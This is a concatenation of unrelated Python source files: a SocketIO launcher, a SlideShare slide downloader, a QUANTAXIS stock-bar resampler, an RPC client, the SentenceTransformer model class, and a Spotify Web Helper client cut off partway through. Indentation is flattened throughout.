from app import socketio, app
from config import DEBUG
from models import db_init
db_init()
socketio.run(app, debug=DEBUG)
|
slideshare_downloader.py
|
# slideshare downloader
from bs4 import BeautifulSoup
import requests
import itertools
import threading
import time
import sys
import urllib.request
import img2pdf
import os
task = False
process = "getting the slides "
def animate():
for i in itertools.cycle(['|', '/', '-', '\\']):
if task:
break
sys.stdout.write('\r' + process + i)
sys.stdout.flush()
time.sleep(0.1)
t = threading.Thread(target=animate)
def get_image_list(url):
code = requests.get(url)
soup = BeautifulSoup(code.text, "html.parser")
print(f"Title: {soup.title.get_text()}")
imgs = soup.find_all("img")
img_urls = []
for temp_url in imgs:
temp_link = temp_url.get("data-full")
if temp_link is not None:
img_urls.append(temp_link)
return img_urls
def slides_capture(links):
pg_no = 1
os.makedirs(".cache", exist_ok=True)
all_slides = []
for link in links:
print(f"fetching (slide{pg_no})")
file = f"slide{pg_no}.jpg"
urllib.request.urlretrieve(link, ".cache/"+file)
all_slides.append(".cache/"+file)
pg_no = pg_no+1
return all_slides
def combine(all_slides):
output_name = input(
"\n\n Enter the name for pdf file of slides (without extension):")
with open(output_name+".pdf", "wb") as f:
f.write(img2pdf.convert(all_slides))
for i in all_slides:
os.remove(i)
print("Enter the URL of slides below:")
main_link = input()
t.start()
all_urls = get_image_list(main_link)
if len(all_urls) == 0:
print("Sorry no downloadable slides found")
task = True
else:
print(f"Total no of Slides found: {len(all_urls)}")
all_slides = slides_capture(all_urls)
task = True
combine(all_slides)
print("All set your file is ready")
|
stock_resampler.py
|
# **************************************************************************** #
# #
# ::: :::::::: #
# stockResampler.py :+: :+: :+: #
# +:+ +:+ +:+ #
# By: zhongjy1992 <zhongjy1992@outlook.com> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2020/03/03 22:19:37 by zhongjy1992 #+# #+# #
# Updated: 2020/03/06 14:06:35 by zhongjy1992 ### ########.fr #
# #
# **************************************************************************** #
import datetime
import json
import logging
import multiprocessing
import os
import threading
import time
import click
import pandas as pd
from QAPUBSUB.consumer import subscriber, subscriber_routing
from QAPUBSUB.producer import publisher
from QARealtimeCollector.setting import eventmq_ip
from QUANTAXIS.QAEngine.QAThreadEngine import QA_Thread
from QARealtimeCollector.utils.common import create_empty_stock_df, tdx_stock_bar_resample_parallel, util_is_trade_time, \
get_file_name_by_date, logging_csv, util_to_json_from_pandas
logger = logging.getLogger(__name__)
class QARTCStockBarResampler(QA_Thread):
"""
应启动一个线程单独重采样1min的数据,然后按需求根据1min的数据重新采样为多周期数据
若有一个内存数据库,则可以把数据先写入数据库,然后再根据订阅读取进行拉取(redis, mongo?)
"""
def __init__(self, frequency='5min', date: datetime.datetime = None, log_dir='./log'):
"""
暂时不支持单个股票重采样
:param frequency:
"""
super().__init__()
logger.info("QA实时股票Bar重采样,初始化...周期: %s" % frequency)
if isinstance(frequency, float):
self.frequency = int(frequency)
elif isinstance(frequency, str):
_frequency = frequency.replace('min', '')
if str.isnumeric(_frequency):
self.frequency = int(_frequency)
else:
logger.error("不支持的周期 unknownFrequency: %s" % frequency)
return
elif isinstance(frequency, int):
self.frequency = frequency
else:
logger.error("不支持的周期 unknownFrequency: %s" % frequency)
return
self.market_data = None
# 接收stock tick 数据
self.sub = subscriber(
host=eventmq_ip, exchange='realtime_stock_min')
self.sub.callback = self.on_message_callback
self.stock_sub = subscriber_routing(host=eventmq_ip, exchange='QARealtime_Market', routing_key='stock')
self.stock_sub.callback = self.on_stock_subscribe_message_callback
# 发送重采样的数据
self.pub = publisher(host=eventmq_ip, exchange='realtime_stock_{}_min'.format(self.frequency))
self.count = 0
self.code_list = []
cur_time = datetime.datetime.now() if date is None else date
self.cur_year = cur_time.year
self.cur_month = cur_time.month
self.cur_day = cur_time.day
# 多进程计算
self.cpu_count = multiprocessing.cpu_count() - 1
self.log_dir = log_dir
threading.Thread(target=self.sub.start, daemon=True).start()
threading.Thread(target=self.stock_sub.start, daemon=True).start()
def publish_msg(self, text):
self.pub.pub(text)
def on_stock_subscribe_message_callback(self, channel, method, properties, data):
data = json.loads(data)
if data['topic'].lower() == 'subscribe':
logger.info('股票重采样,新的订阅: {}'.format(data['code']))
new_ins = data['code'].replace('_', '.').split(',')
if isinstance(new_ins, list):
for item in new_ins:
self.subscribe_callback(item)
else:
self.subscribe_callback(new_ins)
if data['topic'].lower() == 'unsubscribe':
logger.info('股票重采样,取消订阅: {}'.format(data['code']))
new_ins = data['code'].replace('_', '.').split(',')
if isinstance(new_ins, list):
for item in new_ins:
self.unsubscribe_callback(item)
else:
self.unsubscribe_callback(new_ins)
def subscribe_callback(self, code):
if code not in self.code_list:
self.code_list.append(code)
# initial time series data
# date=datetime.datetime(2019, 5, 9)
self.market_data = pd.concat([
self.market_data, create_empty_stock_df(code, date=datetime.datetime(self.cur_year, self.cur_month,
self.cur_day))
])
logger.info("当日数据初始化中,%s" % code)
pass
def unsubscribe_callback(self, item):
# remove code from market data
pass
def on_message_callback(self, channel, method, properties, body):
# context = pd.read_msgpack(body)
context = pd.DataFrame(json.loads(body))
# merge update
if self.market_data is None:
# self.market_data = context
pass
else:
logger.info("Before market_data, concat and update start, 合并市场数据")
cur_time = datetime.datetime.now()
self.market_data.update(context)
end_time = datetime.datetime.now()
cost_time = (end_time - cur_time).total_seconds()
logger.info("Before market_data, concat and update end, 合并市场数据, 耗时,cost: %s s" % cost_time)
logger.info(self.market_data.to_csv(float_format='%.3f'))
filename = get_file_name_by_date('stock.market.%s.csv', self.log_dir)
# 不追加,复写
logging_csv(self.market_data, filename, index=True, mode='w')
# group by code and resample
try:
cur_time = datetime.datetime.now()
bar_data: pd.DataFrame = tdx_stock_bar_resample_parallel(
self.market_data[self.market_data.close > 0], self.frequency, jobs=self.cpu_count
)
end_time = datetime.datetime.now()
cost_time = (end_time - cur_time).total_seconds()
logger.info("数据重采样耗时,cost: %s" % cost_time)
logger.info("发送重采样数据中start")
# self.publish_msg(bar_data.to_msgpack())
self.publish_msg(util_to_json_from_pandas(bar_data))
logger.info("发送重采样数据完毕end")
logger.info(bar_data.to_csv(float_format='%.3f'))
filename = get_file_name_by_date('stock.bar.%s.csv', self.log_dir)
# 不追加,复写
logging_csv(bar_data, filename, index=True, mode='w')
del bar_data
except Exception as e:
logger.error("failure股票重采样数据. " + e.__str__())
finally:
logger.info("重采样计数 count : %s" % self.count)
self.count += 1
del context
def run(self):
while True:
# 9:15 - 11:31 and 12:58 - 15:00 获取
cur_time = datetime.datetime.now()
if util_is_trade_time(cur_time): # 如果在交易时间
time.sleep(0.2)
else:
time.sleep(1)
@click.command()
# @click.argument()
@click.option('-F', '--frequency', default='5min', help='calculate frequency', type=click.STRING)
@click.option('-log', '--logfile', help="log file path", type=click.Path(exists=False))
@click.option('-log_dir', '--log_dir', help="log path", type=click.Path(exists=False))
def main(frequency: str, logfile: str = None, log_dir: str = None):
try:
from QARealtimeCollector.utils.logconf import update_log_file_config
logfile = 'stock.resample.log' if logfile is None else logfile
log_dir = '' if log_dir is None else log_dir
logging.config.dictConfig(update_log_file_config(logfile))
except Exception as e:
print(e.__str__())
# TODO suuport codelist file
QARTCStockBarResampler(frequency=frequency, log_dir=log_dir.replace('~', os.path.expanduser('~'))).run()
if __name__ == '__main__':
main()
|
Client.py
|
import socket
import logging
import time, datetime
import rpyc
import psutil, platform
from re import finditer
from Languages.Server_lang import lang
from multiprocessing import Manager
from Clients import *
from os import listdir
from collections import defaultdict
try:
import Server
except ImportError: pass
def main():
import sys
logging.basicConfig(format="%(asctime)s %(levelname)s | %(message)s", level=logging.DEBUG)
ip = input("ip: ") or "127.0.0.1"
port = input("port: ") or 12412
protocol = input("protocol: ") or "RPC"
cl = Client(ip, port, {}, protocol=protocol)
cl.open()
conn = cl.server.server
s = cl.server
conn.serve_all()
class Client():
def __init__(self, ip:str="localhost", port:int=12412, order_dict:dict={}, protocol="TCP"):
logging.debug(f"Client.__init__(self)")
logging.info("Created new client")
self.listener = None
self.protocol = protocol.upper()
self.__clients_const_by_str = dict([[mod[:-3],eval(f"{mod[:-3]}.{mod[:-3]}")] for mod in listdir(f"{__file__[:-9]}Clients") if mod[-3:] == '.py' and mod != "__init__.py"])
self.ip = str(ip)
self.port = int(port)
self.order_dict = {**order_dict,
"--_ping":self.ping,"--_recon":self.change_server
}
self.server = self.__clients_const_by_str[protocol](ip=self.ip, port=self.port,
order_dict=self.order_dict)
self.conn_step = [lang.Serv_to_Client]
self.__manager = Manager()
try:
Server.Process(target=lambda x: x, args=(1))
self.__can_be_server = True
except Exception:
self.__can_be_server = False
self.next_server = self.__manager.list()
def __enter__(self):
self.open()
def __exit__(self,_,__,___):
self.close()
def open(self):
self.server.open()
def close(self):
self.server.close()
def change_server(self, ip:str, port:int):
self.server.change_server(ip,port)
def ping(self):
self.server.ping()
if __name__ == "__main__":
main()
|
SentenceTransformer.py
|
import json
import logging
import os
import shutil
from collections import OrderedDict
from typing import List, Dict, Tuple, Iterable, Type, Union, Callable
from zipfile import ZipFile
import requests
import numpy as np
import transformers
import torch
from numpy import ndarray
from torch import nn, Tensor, device
from torch.optim import Optimizer
from torch.utils.data import DataLoader
from tqdm.autonotebook import tqdm, trange
import torch.multiprocessing as mp
import math
import queue
from . import __DOWNLOAD_SERVER__
from .evaluation import SentenceEvaluator
from .util import import_from_string, batch_to_device, http_get
from .datasets.EncodeDataset import EncodeDataset
from .models import Transformer, Pooling
from . import __version__
class SentenceTransformer(nn.Sequential):
"""
Loads or create a SentenceTransformer model, that can be used to map sentences / text to embeddings.
:param model_name_or_path: If it is a filepath on disc, it loads the model from that path. If it is not a path, it first tries to download a pre-trained SentenceTransformer model. If that fails, tries to construct a model from Huggingface models repository with that name.
:param modules: This parameter can be used to create custom SentenceTransformer models from scratch.
:param device: Device (like 'cuda' / 'cpu') that should be used for computation. If None, checks if a GPU can be used.
"""
def __init__(self, model_name_or_path: str = None, modules: Iterable[nn.Module] = None, device: str = None):
if model_name_or_path is not None and model_name_or_path != "":
logging.info("Load pretrained SentenceTransformer: {}".format(model_name_or_path))
model_path = model_name_or_path
if not os.path.isdir(model_path) and not model_path.startswith('http://') and not model_path.startswith('https://'):
logging.info("Did not find folder {}. Assume to download model from server.".format(model_path))
model_path = __DOWNLOAD_SERVER__ + model_path + '.zip'
if model_path.startswith('http://') or model_path.startswith('https://'):
model_url = model_path
folder_name = model_url.replace("https://", "").replace("http://", "").replace("/", "_")[:250].rstrip('.zip')
try:
from torch.hub import _get_torch_home
torch_cache_home = _get_torch_home()
except ImportError:
torch_cache_home = os.path.expanduser(
os.getenv('TORCH_HOME', os.path.join(
os.getenv('XDG_CACHE_HOME', '~/.cache'), 'torch')))
default_cache_path = os.path.join(torch_cache_home, 'sentence_transformers')
model_path = os.path.join(default_cache_path, folder_name)
os.makedirs(model_path, exist_ok=True)
if not os.listdir(model_path):
if model_url[-1] == "/":
model_url = model_url[:-1]
logging.info("Downloading sentence transformer model from {} and saving it at {}".format(model_url, model_path))
try:
zip_save_path = os.path.join(model_path, 'model.zip')
http_get(model_url, zip_save_path)
with ZipFile(zip_save_path, 'r') as zip:
zip.extractall(model_path)
os.remove(zip_save_path)
except requests.exceptions.HTTPError as e:
shutil.rmtree(model_path)
if e.response.status_code == 404:
logging.warning('SentenceTransformer-Model {} not found. Try to create it from scratch'.format(model_url))
logging.warning('Try to create Transformer Model {} with mean pooling'.format(model_name_or_path))
model_path = None
transformer_model = Transformer(model_name_or_path)
pooling_model = Pooling(transformer_model.get_word_embedding_dimension())
modules = [transformer_model, pooling_model]
else:
raise e
except Exception as e:
shutil.rmtree(model_path)
raise e
#### Load from disk
if model_path is not None:
logging.info("Load SentenceTransformer from folder: {}".format(model_path))
if os.path.exists(os.path.join(model_path, 'config.json')):
with open(os.path.join(model_path, 'config.json')) as fIn:
config = json.load(fIn)
if config['__version__'] > __version__:
logging.warning("You try to use a model that was created with version {}, however, your version is {}. This might cause unexpected behavior or errors. In that case, try to update to the latest version.\n\n\n".format(config['__version__'], __version__))
with open(os.path.join(model_path, 'modules.json')) as fIn:
contained_modules = json.load(fIn)
modules = OrderedDict()
for module_config in contained_modules:
module_class = import_from_string(module_config['type'])
module = module_class.load(os.path.join(model_path, module_config['path']))
modules[module_config['name']] = module
if modules is not None and not isinstance(modules, OrderedDict):
modules = OrderedDict([(str(idx), module) for idx, module in enumerate(modules)])
super().__init__(modules)
if device is None:
device = "cuda" if torch.cuda.is_available() else "cpu"
logging.info("Use pytorch device: {}".format(device))
self._target_device = torch.device(device)
def encode(self, sentences: Union[str, List[str], List[int]],
batch_size: int = 32,
show_progress_bar: bool = None,
output_value: str = 'sentence_embedding',
convert_to_numpy: bool = True,
convert_to_tensor: bool = False,
is_pretokenized: bool = False,
device: str = None,
num_workers: int = 0) -> Union[List[Tensor], ndarray, Tensor]:
"""
Computes sentence embeddings
:param sentences: the sentences to embed
:param batch_size: the batch size used for the computation
:param show_progress_bar: Output a progress bar when encode sentences
:param output_value: Default sentence_embedding, to get sentence embeddings. Can be set to token_embeddings to get wordpiece token embeddings.
:param convert_to_numpy: If true, the output is a list of numpy vectors. Else, it is a list of pytorch tensors.
:param convert_to_tensor: If true, you get one large tensor as return. Overwrites any setting from convert_to_numpy
:param is_pretokenized: If is_pretokenized=True, sentences must be a list of integers, containing the tokenized sentences with each token convert to the respective int.
:param device: Which torch.device to use for the computation
:param num_workers: Number of background-workers to tokenize data. Set to positive number to increase tokenization speed
:return:
By default, a list of tensors is returned. If convert_to_tensor, a stacked tensor is returned. If convert_to_numpy, a numpy matrix is returned.
"""
self.eval()
if show_progress_bar is None:
show_progress_bar = (logging.getLogger().getEffectiveLevel()==logging.INFO or logging.getLogger().getEffectiveLevel()==logging.DEBUG)
input_was_string = False
if isinstance(sentences, str): #Cast an individual sentence to a list with length 1
sentences = [sentences]
input_was_string = True
if device is None:
device = self._target_device
self.to(device)
all_embeddings = []
length_sorted_idx = np.argsort([len(sen) for sen in sentences])
sentences_sorted = [sentences[idx] for idx in length_sorted_idx]
inp_dataset = EncodeDataset(sentences_sorted, model=self, is_tokenized=is_pretokenized)
inp_dataloader = DataLoader(inp_dataset, batch_size=batch_size, collate_fn=self.smart_batching_collate_text_only, num_workers=num_workers, shuffle=False)
iterator = inp_dataloader
if show_progress_bar:
iterator = tqdm(inp_dataloader, desc="Batches")
for features in iterator:
for feature_name in features:
features[feature_name] = features[feature_name].to(device)
with torch.no_grad():
out_features = self.forward(features)
embeddings = out_features[output_value]
if output_value == 'token_embeddings':
#Set token embeddings to 0 for padding tokens
input_mask = out_features['attention_mask']
input_mask_expanded = input_mask.unsqueeze(-1).expand(embeddings.size()).float()
embeddings = embeddings * input_mask_expanded
all_embeddings.extend(embeddings)
all_embeddings = [all_embeddings[idx] for idx in np.argsort(length_sorted_idx)]
if convert_to_tensor:
all_embeddings = torch.stack(all_embeddings)
elif convert_to_numpy:
all_embeddings = np.asarray([emb.cpu().detach().numpy() for emb in all_embeddings])
if input_was_string:
all_embeddings = all_embeddings[0]
return all_embeddings
def start_multi_process_pool(self, target_devices: List[str] = None, encode_batch_size: int = 32):
"""
Starts multi process to process the encoding with several, independent processes.
This method is recommended if you want to encode on multiple GPUs. It is advised
to start only one process per GPU. This method works together with encode_multi_process
:param target_devices: PyTorch target devices, e.g. cuda:0, cuda:1... If None, all available CUDA devices will be used
:param encode_batch_size: Batch size for each process when calling encode
:return: Returns a dict with the target processes, an input queue and and output queue.
"""
if target_devices is None:
if torch.cuda.is_available():
target_devices = ['cuda:{}'.format(i) for i in range(torch.cuda.device_count())]
else:
logging.info("CUDA is not available. Start 4 CPU worker")
target_devices = ['cpu']*4
logging.info("Start multi-process pool on devices: {}".format(', '.join(map(str, target_devices))))
ctx = mp.get_context('spawn')
input_queue = ctx.Queue()
output_queue = ctx.Queue()
processes = []
for cuda_id in target_devices:
p = ctx.Process(target=SentenceTransformer._encode_multi_process_worker, args=(cuda_id, self, input_queue, output_queue, encode_batch_size), daemon=True)
p.start()
processes.append(p)
return {'input': input_queue, 'output': output_queue, 'processes': processes}
@staticmethod
def stop_multi_process_pool(pool):
"""
Stops all processes started with start_multi_process_pool
"""
for p in pool['processes']:
p.terminate()
for p in pool['processes']:
p.join()
p.close()
pool['input'].close()
pool['output'].close()
def encode_multi_process(self, sentences: List[str], pool: Dict[str, object], is_pretokenized: bool = False):
"""
This method allows to run encode() on multiple GPUs. The sentences are chunked into smaller packages
and sent to individual processes, which encode these on the different GPUs. This method is only suitable
for encoding large sets of sentences
:param sentences: List of sentences
:param pool: A pool of workers started with SentenceTransformer.start_multi_process_pool
:param is_pretokenized: If true, no tokenization will be applied. It is expected that the input sentences are list of ints.
:return: Numpy matrix with all embeddings
"""
chunk_size = min(math.ceil(len(sentences) / len(pool["processes"]) / 10), 5000)
logging.info("Chunk data into packages of size {}".format(chunk_size))
if is_pretokenized:
sentences_tokenized = sentences
else:
sentences_tokenized = map(self.tokenize, sentences)
input_queue = pool['input']
num_chunks = 0
chunk = []
for sentence in sentences_tokenized:
chunk.append(sentence)
if len(chunk) >= chunk_size:
input_queue.put([num_chunks, chunk])
num_chunks += 1
chunk = []
if len(chunk) > 0:
input_queue.put([num_chunks, chunk])
num_chunks += 1
output_queue = pool['output']
results_list = sorted([output_queue.get() for _ in range(num_chunks)], key=lambda x: x[0])
embeddings = np.concatenate([result[1] for result in results_list])
return embeddings
@staticmethod
def _encode_multi_process_worker(target_device: str, model, input_queue, results_queue, encode_batch_size):
"""
Internal working process to encode sentences in multi-process setup
"""
while True:
try:
id, sentences = input_queue.get()
embeddings = model.encode(sentences, device=target_device, is_pretokenized=True, show_progress_bar=False, convert_to_numpy=True, batch_size=encode_batch_size)
results_queue.put([id, embeddings])
except queue.Empty:
break
def get_max_seq_length(self):
"""
Returns the maximal sequence length for input the model accepts. Longer inputs will be truncated
"""
if hasattr(self._first_module(), 'max_seq_length'):
return self._first_module().max_seq_length
return None
def tokenize(self, text: str):
"""
Tokenizes the text
"""
return self._first_module().tokenize(text)
def get_sentence_features(self, *features):
return self._first_module().get_sentence_features(*features)
def get_sentence_embedding_dimension(self):
return self._last_module().get_sentence_embedding_dimension()
def _first_module(self):
"""Returns the first module of this sequential embedder"""
return self._modules[next(iter(self._modules))]
def _last_module(self):
"""Returns the last module of this sequential embedder"""
return self._modules[next(reversed(self._modules))]
def save(self, path):
"""
Saves all elements for this seq. sentence embedder into different sub-folders
"""
if path is None:
return
logging.info("Save model to {}".format(path))
contained_modules = []
for idx, name in enumerate(self._modules):
module = self._modules[name]
model_path = os.path.join(path, str(idx)+"_"+type(module).__name__)
os.makedirs(model_path, exist_ok=True)
module.save(model_path)
contained_modules.append({'idx': idx, 'name': name, 'path': os.path.basename(model_path), 'type': type(module).__module__})
with open(os.path.join(path, 'modules.json'), 'w') as fOut:
json.dump(contained_modules, fOut, indent=2)
with open(os.path.join(path, 'config.json'), 'w') as fOut:
json.dump({'__version__': __version__}, fOut, indent=2)
def smart_batching_collate(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
num_texts = len(batch[0][0])
labels = []
paired_texts = [[] for _ in range(num_texts)]
max_seq_len = [0] * num_texts
for tokens, label in batch:
labels.append(label)
for i in range(num_texts):
paired_texts[i].append(tokens[i])
max_seq_len[i] = max(max_seq_len[i], len(tokens[i]))
features = []
for idx in range(num_texts):
max_len = max_seq_len[idx]
feature_lists = {}
for text in paired_texts[idx]:
sentence_features = self.get_sentence_features(text, max_len)
for feature_name in sentence_features:
if feature_name not in feature_lists:
feature_lists[feature_name] = []
feature_lists[feature_name].append(sentence_features[feature_name])
for feature_name in feature_lists:
#feature_lists[feature_name] = torch.tensor(np.asarray(feature_lists[feature_name]))
feature_lists[feature_name] = torch.cat(feature_lists[feature_name])
features.append(feature_lists)
return {'features': features, 'labels': torch.stack(labels)}
def smart_batching_collate_text_only(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
max_seq_len = max([len(text) for text in batch])
feature_lists = {}
for text in batch:
sentence_features = self.get_sentence_features(text, max_seq_len)
for feature_name in sentence_features:
if feature_name not in feature_lists:
feature_lists[feature_name] = []
feature_lists[feature_name].append(sentence_features[feature_name])
for feature_name in feature_lists:
feature_lists[feature_name] = torch.cat(feature_lists[feature_name])
return feature_lists
def fit(self,
train_objectives: Iterable[Tuple[DataLoader, nn.Module]],
evaluator: SentenceEvaluator,
epochs: int = 1,
steps_per_epoch = None,
scheduler: str = 'WarmupLinear',
warmup_steps: int = 10000,
optimizer_class: Type[Optimizer] = transformers.AdamW,
optimizer_params : Dict[str, object]= {'lr': 2e-5, 'eps': 1e-6, 'correct_bias': False},
weight_decay: float = 0.01,
evaluation_steps: int = 0,
output_path: str = None,
output_path_ignore_not_empty: bool = False,
save_best_model: bool = True,
max_grad_norm: float = 1,
use_amp: bool = False,
callback: Callable[[float, int, int], None] = None,
):
"""
Train the model with the given training objective
Each training objective is sampled in turn for one batch.
We sample only as many batches from each objective as there are in the smallest one
to make sure of equal training with each dataset.
:param train_objectives: Tuples of (DataLoader, LossFunction). Pass more than one for multi-task learning
:param evaluator: An evaluator (sentence_transformers.evaluation) evaluates the model performance during training on held-out dev data. It is used to determine the best model that is saved to disc.
:param epochs: Number of epochs for training
:param steps_per_epoch: Number of training steps per epoch. If set to None (default), one epoch is equal the DataLoader size from train_objectives.
:param scheduler: Learning rate scheduler. Available schedulers: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
:param warmup_steps: Behavior depends on the scheduler. For WarmupLinear (default), the learning rate is increased from o up to the maximal learning rate. After these many training steps, the learning rate is decreased linearly back to zero.
:param optimizer_class: Optimizer
:param optimizer_params: Optimizer parameters
:param weight_decay: Weight decay for model parameters
:param evaluation_steps: If > 0, evaluate the model using evaluator after each number of training steps
:param output_path: Storage path for the model and evaluation files
:param output_path_ignore_not_empty: By default, training will stop if output_path is not empty. If set to true, this error will be ignored and training proceeds.
:param save_best_model: If true, the best model (according to evaluator) is stored at output_path
:param max_grad_norm: Used for gradient normalization.
:param use_amp: Use Automatic Mixed Precision (AMP). Only for Pytorch >= 1.6.0
:param callback: Callback function that is invoked after each evaluation.
It must accept the following three parameters in this order:
`score`, `epoch`, `steps`
"""
if use_amp:
from torch.cuda.amp import autocast
scaler = torch.cuda.amp.GradScaler()
self.to(self._target_device)
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
if not output_path_ignore_not_empty and len(os.listdir(output_path)) > 0:
raise ValueError("Output directory ({}) already exists and is not empty.".format(
output_path))
dataloaders = [dataloader for dataloader, _ in train_objectives]
# Use smart batching
for dataloader in dataloaders:
dataloader.collate_fn = self.smart_batching_collate
loss_models = [loss for _, loss in train_objectives]
device = self._target_device
for loss_model in loss_models:
loss_model.to(device)
self.best_score = -9999999
if steps_per_epoch is None or steps_per_epoch == 0:
steps_per_epoch = min([len(dataloader) for dataloader in dataloaders])
num_train_steps = int(steps_per_epoch * epochs)
# Prepare optimizers
optimizers = []
schedulers = []
for loss_model in loss_models:
param_optimizer = list(loss_model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': weight_decay},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = optimizer_class(optimizer_grouped_parameters, **optimizer_params)
scheduler_obj = self._get_scheduler(optimizer, scheduler=scheduler, warmup_steps=warmup_steps, t_total=num_train_steps)
optimizers.append(optimizer)
schedulers.append(scheduler_obj)
global_step = 0
data_iterators = [iter(dataloader) for dataloader in dataloaders]
num_train_objectives = len(train_objectives)
skip_scheduler = False
for epoch in trange(epochs, desc="Epoch"):
training_steps = 0
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
for _ in trange(steps_per_epoch, desc="Iteration", smoothing=0.05):
for train_idx in range(num_train_objectives):
loss_model = loss_models[train_idx]
optimizer = optimizers[train_idx]
scheduler = schedulers[train_idx]
data_iterator = data_iterators[train_idx]
try:
data = next(data_iterator)
except StopIteration:
#logging.info("Restart data_iterator")
data_iterator = iter(dataloaders[train_idx])
data_iterators[train_idx] = data_iterator
data = next(data_iterator)
features, labels = batch_to_device(data, self._target_device)
if use_amp:
with autocast():
loss_value = loss_model(features, labels)
scale_before_step = scaler.get_scale()
scaler.scale(loss_value).backward()
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
scaler.step(optimizer)
scaler.update()
skip_scheduler = scaler.get_scale() != scale_before_step
else:
loss_value = loss_model(features, labels)
loss_value.backward()
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
optimizer.step()
optimizer.zero_grad()
if not skip_scheduler:
scheduler.step()
training_steps += 1
global_step += 1
if evaluation_steps > 0 and training_steps % evaluation_steps == 0:
self._eval_during_training(evaluator, output_path, save_best_model, epoch,
training_steps, callback)
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
self._eval_during_training(evaluator, output_path, save_best_model, epoch,
-1, callback)
def evaluate(self, evaluator: SentenceEvaluator, output_path: str = None):
"""
Evaluate the model
:param evaluator:
the evaluator
:param output_path:
the evaluator can write the results to this path
"""
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
return evaluator(self, output_path)
def _eval_during_training(self, evaluator, output_path, save_best_model, epoch, steps, callback):
"""Runs evaluation during the training"""
if evaluator is not None:
score = evaluator(self, output_path=output_path, epoch=epoch, steps=steps)
if callback is not None:
callback(score, epoch, steps)
if score > self.best_score and save_best_model:
self.save(output_path)
self.best_score = score
def _get_scheduler(self, optimizer, scheduler: str, warmup_steps: int, t_total: int):
"""
Returns the correct learning rate scheduler. Available scheduler: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
"""
scheduler = scheduler.lower()
if scheduler == 'constantlr':
return transformers.get_constant_schedule(optimizer)
elif scheduler == 'warmupconstant':
return transformers.get_constant_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps)
elif scheduler == 'warmuplinear':
return transformers.get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosine':
return transformers.get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosinewithhardrestarts':
return transformers.get_cosine_with_hard_restarts_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
else:
raise ValueError("Unknown scheduler {}".format(scheduler))
@property
def device(self) -> device:
"""
Get torch.device from module, assuming that the whole module has one device.
"""
try:
return next(self.parameters()).device
except StopIteration:
# For nn.DataParallel compatibility in PyTorch 1.5
def find_tensor_attributes(module: nn.Module) -> List[Tuple[str, Tensor]]:
tuples = [(k, v) for k, v in module.__dict__.items() if torch.is_tensor(v)]
return tuples
gen = self._named_members(get_members_fn=find_tensor_attributes)
first_tuple = next(gen)
return first_tuple[1].device
@property
def tokenizer(self):
"""
Property to get the tokenizer that is used by this model
"""
return self._first_module().tokenizer
@tokenizer.setter
def tokenizer(self, value):
"""
Property to set the tokenizer that is should used by this model
"""
self._first_module().tokenizer = value
@property
def max_seq_length(self):
"""
Property to get the maximal input sequence length for the model. Longer inputs will be truncated.
"""
return self._first_module().max_seq_length
@max_seq_length.setter
def max_seq_length(self, value):
"""
Property to set the maximal input sequence length for the model. Longer inputs will be truncated.
"""
self._first_module().max_seq_length = value
|
spotify_web_helper.py
|
from json.decoder import JSONDecodeError
import logging
from random import choices
from socket import SOCK_STREAM
from string import ascii_lowercase
import threading
import psutil
from psutil import CONN_LISTEN
import requests
from requests.exceptions import ConnectionError, Timeout
__all__ = ('wait_for_helper', 'connect_to_helper', 'SpotifyWebHelperObserver')
################################################################################################################################################################
logger = logging.getLogger(__name__)
################################################################################################################################################################
def wait_for_helper(npn, terminating):
while not terminating.is_set():
candidate_ports = frozenset(
conn.laddr[1]
for proc in psutil.process_iter() if (
proc.name() == 'SpotifyWebHelper.exe'
)
for conn in proc.connections() if (
(conn.type == SOCK_STREAM) and
(conn.status == CONN_LISTEN) and
(conn.raddr == ()) and
(conn.laddr[0] == '127.0.0.1') and
(conn.laddr[1] >= 4370) and
(conn.laddr[1] <= 4379)
)
)
for port in candidate_ports:
if connect_to_helper(npn, terminating, port):
break # We're exiting cleanly; no need to test further ports or back off…
else:
terminating.wait(2) # No successful connections were established; back off…
def connect_to_helper(npn, terminating, port):
player_name = 'Spotify Web Helper via port {0:d}'.format(port)
subdomain = ''.join(choices(ascii_lowercase, k=10))
base_url = 'https://{0:s}.spotilocal.com:{1:d}'.format(subdomain, port)
token_url = '{0:s}/simplecsrf/token.json'.format(base_url)
status_url = '{0:s}/remote/status.json'.format(base_url)
headers = {'Origin': 'https://open.spotify.com'}
logger.info('«{0:s}» will try RPC…'.format(player_name))
try:
# We can only get a token if Spotify's running…
while not terminating.is_set():
response = requests.get(token_url, headers=headers, timeout=(3.5, 6.5)).json()
if 'token' in response:
csrf = response['token']
break
else:
terminating.wait(2)
else:
logger.info('«{0:s}» is bailing…'.format(player_name))
return True
oauth = requests.get('https://open.spotify.com/token', timeout=(3.5, 6.5)).json()['t']
logger.info('«{0:s}» can RPC…'.format(player_name))
return_after = 0
old_track = None
while not terminating.is_set():
status = requests.get(status_url, params={
'csrf': csrf,
'oauth': oauth,
'returnafter': return_after,
'returnon': 'login,logout,play,pause,error,ap' if return_after else '',
}, headers=headers, timeout=(3.5, return_after + 6.5)).json()
